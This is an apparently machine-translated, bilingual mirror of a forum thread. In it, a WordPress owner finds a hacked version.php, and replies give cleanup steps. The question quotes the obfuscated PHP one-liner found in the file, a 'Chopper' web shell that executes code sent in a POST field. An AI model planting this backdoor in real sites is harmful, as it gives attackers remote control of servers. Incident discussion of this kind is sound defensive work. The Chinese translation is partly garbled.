简体   繁体   English

管理员页面上的Wordpress错误

[英]Wordpress Error on Admin page

When I try to do log in in my wordpress page appears this errors: 当我尝试在我的wordpress页面中登录时,出现以下错误:

Warning: assert() [function.assert]: Assertion failed in /home/osisonli/public_html/version.php on line 1 Chopper Connection Warning: include_once(rc-templates/-row-templates.php) [function.include-once]: failed to open stream: No such file or directory in /home/osisonli/public_html/wp-content/themes/porto/framework/builder/spyropress-builder-init.php on line 118 警告:assert()[function.assert]:断言在第1行斩波器连接的/home/osisonli/public_html/version.php中失败警告:include_once(rc-templates / -row-templates.php)[function.include-once ]:无法打开流:在第118行的/home/osisonli/public_html/wp-content/themes/porto/framework/builder/spyropress-builder-init.php中没有此类文件或目录

Warning: include_once() [function.include]: Failed opening 'rc-templates/-row-templates.php' for inclusion (include_path='.:/usr/lib/php') in /home/osisonli/public_html/wp-content/themes/porto/framework/builder/spyropress-builder-init.php on line 118 警告:include_once()[function.include]:无法在/ home / osisonli / public_html / wp中打开'rc-templates / -row-templates.php'以便包含(include_path ='。:/ usr / lib / php')第118行的-content / themes / porto / framework / builder / spyropress-builder-init.php

Warning: include_once(rc-templates/-col-templates.php) [function.include-once]: failed to open stream: No such file or directory in /home/osisonli/public_html/wp-content/themes/porto/framework/builder/spyropress-builder-init.php on line 119 警告:include_once(rc-templates / -col-templates.php)[function.include-once]:无法打开流:/ home / osisonli / public_html / wp-content / themes / porto / framework中没有此类文件或目录第119行的/builder/spyropress-builder-init.php

etc.... 等等....

When I opened /home/osisonli/public_html/version.php , it's contains the following $k="ass"."ert"; $k(${"_PO"."ST"} ['c']); 当我打开/home/osisonli/public_html/version.php ,它包含以下$k="ass"."ert"; $k(${"_PO"."ST"} ['c']); /home/osisonli/public_html/version.php $k="ass"."ert"; $k(${"_PO"."ST"} ['c']); Chopper Connection 斩波器连接

Obviously I think my server was hacked, but what can I do to resolve this? 显然,我认为我的服务器被黑客入侵了,但是我该怎么办才能解决此问题? Is there somebody who happened this too? 是否也有人发生过这种情况?

Thanks in advance... 提前致谢...

  1. Make backups and put it in a safe place. 进行备份并将其放在安全的地方。
  2. After this download all your website files to local computer. 之后,将所有网站文件下载到本地计算机。
  3. Check local directory with antivirus and cure infected files. 使用防病毒软件检查本地目录并治愈受感染的文件。
  4. Download correct version of WordPress and replace damaged files from original distribution. 下载正确版本的WordPress并替换原始发行版中损坏的文件。
  5. Upload data to remote server. 将数据上传到远程服务器。

First of all backup everything. 首先备份所有内容。

  1. Then undone the changes if you had made prior to the occurring error. 然后,如果您是在发生错误之前进行的,则撤消更改。

  2. If things does not solve out. 如果事情没有解决。 Then download the current version of WordPress Login to your hosting account then if you have then upload the all the files except the wp-content.Better to use Filezilla to send files using FTP. 然后将当前版本的WordPress登录名下载到您的托管帐户,然后再上传除wp-content之外的所有文件。最好使用Filezilla通过FTP发送文件。

  3. If problem persists, then I would recommend better to reinstall the WordPress. 如果问题仍然存在,那么我建议最好重新安装WordPress。

Don't foget to backup 不要急于备份

PHP backdoor on your server. 服务器上的PHP后门。 Someone had access to your site through it. 有人可以通过它访问您的网站。 Most of the time regular bots scanning the net for vulnerable WP pages, and I think this is how your page was found. 大多数时候,常规僵尸程序会在网络上扫描易受攻击的WP页面,我认为这是找到您的页面的方式。

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM